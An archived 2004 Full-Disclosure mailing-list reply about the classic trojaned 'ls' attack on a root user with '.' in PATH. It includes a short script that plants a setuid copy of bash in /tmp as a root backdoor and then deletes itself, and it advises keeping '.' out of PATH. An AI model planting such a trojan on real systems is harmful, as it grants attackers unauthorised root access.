|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-Disclosure] Old LS Trojan?
Valdis.Kletnieks
vt.edu
Date: Wed Dec 01 2004 - 16:03:43 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Wed, 01 Dec 2004 15:11:46 EST, "David S. Morgan" said:
> I am looking for an old LS trojan, with trojan being a misnomer. Essentially
, the scinario is that the admin (root) has a . (dot) in his path.
Geez. I don't have it, but it's easy enough to write.
% cat > ./ls
!!/bin/bash
/bin/cp /bin/bash /tmp/foobar
/bin/chmod 4755 /tmp/foobar
/bin/ls $*
/bin/rm -f $0
^D
% chmod +x ./ls
(Fix the shell magic and lack of > and 2> redirects yourself. Bonus points
for wrapping a check for $USER == root around the first 2 lines, and even
more for doing the *right* check ;)
And no, there's nothing in most "modern" unixoids that will "prevent" this
attack, other than not having '.' in the $PATH by default.
Incidentally, '.' at the front of $PATH is more dangerous for this, but I know
of at least one case where the sysadmin had '.' at the *end* and thought himself
safe - the attacker called it './sl' and waited for a typo (insider job, attacker
knew the admin was a poor typist ;)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001
iD8DBQFBrj++cC3lWbTT17ARAj40AJ98w0l6IBCx+x1u/UOuaYIJsPCHVgCfTEnm
fqB+nOh3jC4C3k+jWskqTPU=
=ETXU
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]